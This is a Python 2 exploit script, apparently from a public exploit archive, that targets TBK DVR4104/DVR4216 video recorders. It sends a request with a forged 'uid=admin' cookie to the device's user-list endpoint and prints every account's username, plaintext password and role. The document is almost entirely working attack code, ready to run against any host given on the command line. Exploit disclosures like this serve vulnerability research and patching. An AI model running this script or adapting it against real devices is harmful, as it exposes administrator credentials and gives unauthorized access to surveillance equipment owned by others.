TBK DVR4104 / DVR4216 Credential Disclosure

`# -*- coding: utf-8 -*-   
import json  
import requests  
import argparse  
import tableprint as tp  
  
class Colors:  
BLUE = '\033[94m'  
GREEN = '\033[32m'  
RED = '\033[0;31m'  
DEFAULT = '\033[0m'  
ORANGE = '\033[33m'  
WHITE = '\033[97m'  
BOLD = '\033[1m'  
BR_COLOUR = '\033[1;37;40m'  
  
banner = '''  
__..--.._  
..... .--~ ..... `.  
.": "`-.. . .' ..-'" :". `  
` `._ ` _.'`"( `-"'`._ ' _.' '  
~~~ `. ~~~  
.'  
/  
(  
^---'  
  
  
[*] @capitan_alfa  
'''  
  
details = '''   
# Exploit Title: DVRs; Credentials Exposed  
# Date: 09/04/2018  
# Exploit Author: Fernandez Ezequiel ( @capitan_alfa )  
'''  
parser = argparse.ArgumentParser(prog='getDVR_Credentials.py',  
description=' [+] Obtaining Exposed credentials',   
epilog='[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81',  
version="1.1")  
  
parser.add_argument('--host', dest="HOST", help='Host', required=True)  
parser.add_argument('--port', dest="PORT", help='Port', default=80)  
  
args = parser.parse_args()  
  
HST = args.HOST  
port = args.PORT  
  
headers = {}  
  
fullHost_1 = "http://"+HST+":"+str(port)+"/device.rsp?opt=user&cmd=list"  
host = "http://"+HST+":"+str(port)+"/"  
  
print Colors.GREEN+banner+Colors.DEFAULT  
  
  
def makeReqHeaders(xCookie):  
headers["Host"] = host  
headers["User-Agent"] = "Morzilla/7.0 (911; Pinux x86_128; rv:9743.0)"  
headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"  
headers["Accept-Languag"] = "es-AR,en-US;q=0.7,en;q=0.3"  
headers["Connection"] = "close"  
headers["Content-Type"] = "text/html"  
headers["Cookie"] = "uid="+xCookie  
  
return headers  
  
try:  
rX = requests.get(fullHost_1,headers=makeReqHeaders(xCookie="admin"),timeout=10.000)  
except Exception,e:  
print Colors.RED+" [+] Timed out\n"+Colors.DEFAULT  
exit()  
  
badJson = rX.text  
try:  
dataJson = json.loads(badJson)  
totUsr = len(dataJson["list"]) #--> 10  
except Exception, e:  
print " [+] Error: "+str(e)  
print " [>] json: "+str(rX)  
# print " [>] Reuest: \n"+str(makeReqHeaders(xCookie="admin"))  
exit()  
  
  
print Colors.GREEN+"\n [+] DVR (url):\t\t"+Colors.ORANGE+str(host)+Colors.GREEN  
print " [+] Port: \t\t"+Colors.ORANGE+str(port)+Colors.DEFAULT  
  
print Colors.GREEN+"\n [+] Users List:\t"+Colors.ORANGE+str(totUsr)+Colors.DEFAULT  
print " "  
  
final_data = []  
try:  
for obj in range(0,totUsr):  
  
temp = []  
  
_usuario = dataJson["list"][obj]["uid"]  
_password = dataJson["list"][obj]["pwd"]  
_role = dataJson["list"][obj]["role"]  
  
temp.append(_usuario)   
temp.append(_password)  
temp.append(_role)  
  
final_data.append(temp)  
  
hdUsr = Colors.GREEN + "Username" + Colors.DEFAULT  
hdPass = Colors.GREEN + "Password" + Colors.DEFAULT  
hdRole = Colors.GREEN + "Role ID" + Colors.DEFAULT  
  
cabeceras = [hdUsr, hdPass, hdRole]   
  
tp.table(final_data, cabeceras, width=20)  
  
except Exception, e:  
print "\n [!]: "+str(e)  
print " [+] "+ str(dataJson)  
  
print "\n"  
  
`